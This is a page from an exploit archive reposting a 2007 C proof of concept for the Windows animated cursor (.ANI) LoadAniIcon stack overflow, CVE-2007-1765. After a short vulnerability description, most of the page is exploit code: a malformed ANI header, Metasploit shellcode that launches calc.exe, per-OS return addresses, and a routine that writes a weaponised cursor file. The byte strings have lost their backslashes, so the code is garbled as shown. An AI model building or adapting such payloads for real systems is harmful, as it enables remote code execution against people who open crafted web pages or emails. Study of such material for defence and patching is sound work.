MS Windows Animated Cursor (.ANI) Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows Animated Cursor (.ANI) Stack Overflow Exploit
# Published : 2007-03-31
# Author : devcode
# Previous Title : Linux Kernel <= 2.6.20 with DCCP Support Memory Disclosure Exploit v2
# Next Title : FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit
/*
* Copyright (c) 2007 devcode
*
*
*			^^ D E V C O D E ^^
*
* Windows .ANI LoadAniIcon Stack Overflow
* [CVE-2007-1765]
*
*
* Description:
*    A vulnerability has been identified in Microsoft Windows,
*	  which could be exploited by remote attackers to take complete
*	  control of an affected system. This issue is due to a stack overflow
*    error within the "LoadAniIcon()" [user32.dll] function when rendering
*    cursors, animated cursors or icons with a malformed header, which could
*	  be exploited by remote attackers to execute arbitrary commands by
*    tricking a user into visiting a malicious web page or viewing an email
*    message containing a specially crafted ANI file.
*
* Hotfix/Patch:
*    None as of this time.
*
* Vulnerable systems:
*	  Microsoft Windows 2000 Service Pack 4
*	  Microsoft Windows XP Service Pack 2
*	  Microsoft Windows XP 64-Bit Edition version 2003 (Itanium)
*	  Microsoft Windows XP Professional x64 Edition
*	  Microsoft Windows Server 2003
*	  Microsoft Windows Server 2003 (Itanium)
*	  Microsoft Windows Server 2003 Service Pack 1
*	  Microsoft Windows Server 2003 Service Pack 1 (Itanium)
*	  Microsoft Windows Server 2003 x64 Edition
*	  Microsoft Windows Vista
*
*	  Microsoft Internet Explorer 6
*	  Microsoft Internet Explorer 7
*
*    This is a PoC and was created for educational purposes only. The
*	  author is not held responsible if this PoC does not work or is
*	  used for any other purposes than the one stated above.
*
* Notes:
*	  For this to work on XP SP2 on explorer.exe, DEP has to be turned
*	  off.
*
*/
#include <iostream>
#include <windows.h>

/* ANI Header */
unsigned char uszAniHeader[] =
"x52x49x46x46x00x04x00x00x41x43x4Fx4Ex61x6Ex69x68"
"x24x00x00x00x24x00x00x00xFFxFFx00x00x0Ax00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x10x00x00x00x01x00x00x00x54x53x49x4Cx03x00x00x00"
"x10x00x00x00x54x53x49x4Cx03x00x00x00x02x02x02x02"
"x61x6Ex69x68xA8x03x00x00";

/* Shellcode - metasploit exec calc.exe ^^ */
unsigned char uszShellcode[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x37x49x49x49x49x51x5ax6ax42"
"x58x50x30x41x31x42x41x6bx41x41x52x32x41x42x41x32"
"x42x41x30x42x41x58x50x38x41x42x75x38x69x79x6cx4a"
"x48x67x34x47x70x77x70x53x30x6ex6bx67x35x45x6cx4c"
"x4bx73x4cx74x45x31x68x54x41x68x6fx6cx4bx70x4fx57"
"x68x6ex6bx71x4fx45x70x65x51x5ax4bx67x39x4cx4bx50"
"x34x4cx4bx77x71x68x6ex75x61x4bx70x4ex79x6ex4cx4d"
"x54x4bx70x72x54x65x57x69x51x49x5ax46x6dx37x71x6f"
"x32x4ax4bx58x74x77x4bx41x44x44x64x35x54x72x55x7a"
"x45x6cx4bx53x6fx51x34x37x71x48x6bx51x76x4cx4bx76"
"x6cx50x4bx6ex6bx71x4fx67x6cx37x71x68x6bx4cx4bx65"
"x4cx4cx4bx64x41x58x6bx4bx39x53x6cx75x74x46x64x78"
"x43x74x71x49x50x30x64x6ex6bx43x70x44x70x4cx45x4f"
"x30x41x68x44x4cx4ex6bx63x70x44x4cx6ex6bx30x70x65"
"x4cx4ex4dx6cx4bx30x68x75x58x7ax4bx35x59x4cx4bx4d"
"x50x58x30x37x70x47x70x77x70x6cx4bx65x38x57x4cx31"
"x4fx66x51x48x76x65x30x70x56x4dx59x4ax58x6ex63x69"
"x50x31x6bx76x30x55x38x5ax50x4ex6ax36x64x63x6fx61"
"x78x6ax38x4bx4ex6cx4ax54x4ex76x37x6bx4fx4bx57x70"
"x63x51x71x32x4cx52x43x37x70x42";

char szIntro[] =
"nttWindows .ANI LoadAniIcon Stack Overflown"
"tttdevcode (c) 2007n"
"[+] Targets:n"
"t(1) Windows XP SP2n"
"t(2) Kernel32.dll (ExitProcess)n"
"t(3) Windows 2K SP4nn"
"Usage: ani.exe <target> <file>";

typedef struct {
	const char *szTarget;
	unsigned char uszRet[5];
} TARGET;

TARGET targets[] = {
	{ "Windows XP SP2", "xC9x29xD4x77" },				/* call esp */
	{ "Kernel32.dll (ExitProcess)", "x90x90x90x90" },	/* ExitProcess */
	{ "Windows 2K SP4", "x29x4CxE1x77" }
};

int main( int argc, char **argv ) {
	char szBuffer[1024];
	FILE *f;
	void *pExitProcess[4];

	if ( argc < 3 ) {
		printf("%sn", szIntro );
		return 0;
	}

	if ( atoi( argv[1] ) == 1 ) {
		printf("[+] Getting ExitProcess address...n");
		*pExitProcess = GetProcAddress( GetModuleHandle( "kernel32.dll" ), 
"ExitProcess" );
		if ( pExitProcess == NULL ) {
			printf("[-] Cannot get ExitProcess addressn");
			return 0;
		}
		memcpy( targets[1].uszRet, pExitProcess, 4 );
	}

	printf("[+] Creating ANI header...n");
	memset( szBuffer, 0x90, sizeof( szBuffer ) );
	memcpy( szBuffer, uszAniHeader, sizeof( uszAniHeader ) - 1 );

	printf("[+] Copying shellcode...n");
	memcpy( szBuffer + 168, targets[atoi( argv[1] )].uszRet, 4 );
	memcpy( szBuffer + 192, uszShellcode, sizeof( uszShellcode ) - 1 );

	f = fopen( argv[2], "wb" );
	if ( f == NULL ) {
		printf("[-] Cannot create filen");
		return 0;
	}

	fwrite( szBuffer, 1, 1024, f );
	fclose( f );
	printf("[+] .ANI file succesfully created!n");
	return 0;
}

// www.Syue.com [2007-03-31]